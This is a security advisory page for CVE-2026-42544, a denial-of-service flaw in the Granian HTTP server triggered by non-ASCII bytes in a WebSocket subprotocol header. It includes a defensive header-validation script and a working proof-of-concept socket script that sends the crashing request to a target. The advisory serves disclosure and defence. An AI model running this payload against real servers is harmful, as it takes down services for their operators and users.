Security Vulnerability Report
CVE-2026-42544 (CVSS 7.5, HIGH)

Published: 2026-05-12 22:16:34
Last Modified: 2026-05-13 16:10:58

Description

Granian is a Rust HTTP server for Python applications. From 1.2.0 to 2.7.4, Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes. The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked. This vulnerability is fixed in 2.7.4.
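As an added example (not code from the advisory or from the Granian project), the validator below applies the RFC 6455 grammar for Sec-WebSocket-Protocol (a comma-separated list of RFC 2616 tokens, so US-ASCII only) to the raw header bytes, and an audit helper runs it over a request head such as the one the advisory describes. The two request heads are constructed for this example; the function names are my own.

```python
# Constructed sample request heads. BAD_HEAD carries the raw 0xFF 0xFE bytes
# in Sec-WebSocket-Protocol that the advisory describes; GOOD_HEAD is well-formed.
BAD_HEAD = (b"GET / HTTP/1.1\r\nHost: localhost\r\nUpgrade: websocket\r\n"
            b"Connection: Upgrade\r\nSec-WebSocket-Version: 13\r\n"
            b"Sec-WebSocket-Protocol: chat, \xff\xfe\r\n\r\n")
GOOD_HEAD = (b"GET / HTTP/1.1\r\nHost: localhost\r\nUpgrade: websocket\r\n"
             b"Connection: Upgrade\r\nSec-WebSocket-Version: 13\r\n"
             b"Sec-WebSocket-Protocol: chat, superchat\r\n\r\n")

# RFC 2616 token: one or more visible US-ASCII characters, none of these separators.
_SEPARATORS = set(b'()<>@,;:\\"/[]?={} \t')


def is_token(name: bytes) -> bool:
    return bool(name) and all(0x20 < b < 0x7F and b not in _SEPARATORS for b in name)


def check_ws_protocol(value: bytes) -> tuple[bool, str]:
    """Validate one raw Sec-WebSocket-Protocol value without decoding it as text."""
    bad = [b for b in value if b > 0x7F]
    if bad:  # the exact precondition named in the advisory
        return False, "non-ASCII byte(s) " + " ".join(f"0x{b:02x}" for b in bad)
    names = [n.strip(b" \t") for n in value.split(b",")]
    names = [n for n in names if n]  # tolerate empty list elements ("a,,b")
    if not names:
        return False, "empty subprotocol list"
    for n in names:
        if not is_token(n):
            return False, f"invalid subprotocol token {n!r}"
    return True, "ok"


def audit_head(head: bytes) -> list[str]:
    """Return findings for a raw request head (request line through the blank line)."""
    findings = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"sec-websocket-protocol":
            ok, why = check_ws_protocol(value.strip(b" \t"))
            if not ok:
                findings.append(f"Sec-WebSocket-Protocol rejected: {why}")
    return findings


if __name__ == "__main__":
    for label, head in (("bad", BAD_HEAD), ("good", GOOD_HEAD)):
        print(label, audit_head(head) or ["no findings"])
```

Because the advisory places the crash before the ASGI application is invoked, a check like this only helps in front of the server (reverse proxy, WAF, or a log audit), not as application middleware; the remediation is the fixed release.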

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration (CPE) data available. Versions named in the advisory:

Granian 1.2.0 (first affected version)
Granian 2.7.4 (fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Target configuration
host = "127.0.0.1"
port = 8000

# Malicious payload containing non-ASCII bytes (\xff\xfe) in Sec-WebSocket-Protocol
payload = (
    "GET / HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "Sec-WebSocket-Protocol: chat, \xff\xfe\r\n"  # Injecting non-ASCII bytes
    "\r\n"
)

# Send the malicious request
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    # latin-1 keeps \xff\xfe as single raw bytes (utf-8 would re-encode them as two bytes each)
    s.sendall(payload.encode("latin-1"))
    print("[+] Malicious payload sent successfully.")
    s.close()
except Exception as e:
    print(f"[-] Error: {e}")
```

References

https://github.com/emmett-framework/granian/security/advisories/GHSA-vrg7-482j-p6f6 (GitHub security advisory)

Weaknesses (CWE)

CWE-20, CWE-248, CWE-400

Record status: Deferred